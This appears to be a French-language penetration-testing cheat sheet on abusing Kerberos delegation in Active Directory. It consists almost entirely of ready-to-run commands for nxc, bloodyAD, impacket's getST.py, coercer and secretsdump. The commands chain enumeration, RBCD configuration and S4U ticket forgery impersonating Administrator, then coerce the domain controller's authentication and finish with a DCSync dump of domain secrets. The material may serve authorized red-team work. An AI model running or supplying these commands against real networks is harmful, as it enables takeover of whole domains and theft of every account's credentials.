nxc ldap $DC -u $USER -p $PASS --trusted-for-delegationDescription: Identifier les comptes et machines avec délégation unconstrained.
Exploitation
Unconstrained, constrained et RBCD : détecter, configurer et exploiter les chemins de délégation.
nxc ldap $DC -u $USER -p $PASS --trusted-for-delegationDescription: Identifier les comptes et machines avec délégation unconstrained.
nxc ldap $DC -u $USER -p $PASS --find-delegationDescription: Cartographier toutes les délégations : unconstrained, constrained et RBCD.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --attr msDS-AllowedToDelegateToDescription: Lister les services cibles pour la délégation constrained de chaque compte.
gf ldap -t $DC -u $USER -p $PASS --rbcdDescription: Détecter rapidement les objets exposés au RBCD (msDS-AllowedToActOnBehalfOfOtherIdentity).
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add rbcd '$DELEGATE_TO$' '$DELEGATE_FROM$'Description: Configurer le RBCD : $DELEGATE_TO$ reçoit la confiance de $DELEGATE_FROM$.
getST.py -spn cifs/$TARGET.$DOMAIN -impersonate Administrator -dc-ip $DC $DOMAIN/$DELEGATE_FROM$:$PASSDescription: S4U2Proxy : générer un ST impersonant Administrator vers le service cible.
export KRB5CCNAME=Administrator@cifs_$TARGET.ccacheDescription: Activer le ticket résultant pour les outils impacket et nxc.
nxc smb $TARGET -u Administrator -p '' --use-kcacheDescription: Utiliser le ticket RBCD pour accéder à la machine cible en tant qu'Administrator.
getST.py -spn $SPN -impersonate Administrator -dc-ip $DC $DOMAIN/$SERVICE_USER:$PASSDescription: S4U2Self + S4U2Proxy depuis un compte avec constrained delegation configurée.
getST.py -k -no-pass -spn $SPN -impersonate Administrator $DOMAIN/$SERVICE_USER$Description: Même attaque depuis un compte machine (TGT requis via getTGT.py d'abord).
getST.py -spn $SPN -impersonate Administrator -dc-ip $DC -additional-ticket administrator.ccache $DOMAIN/$USER:$PASSDescription: Constrained delegation avec ticket supplémentaire si protocole transition requis.
coercer coerce -u $USER -p $PASS -d $DOMAIN -t $DC -l $COMPROMISED_HOSTDescription: Coercer le DC vers la machine compromise (unconstrained) : son TGT arrive en mémoire.
secretsdump.py $DOMAIN/$LOCAL_ADMIN:$PASS@$COMPROMISED_HOST -just-dcDescription: Depuis la machine compromise avec TGT DC en mémoire : DCSync immédiat.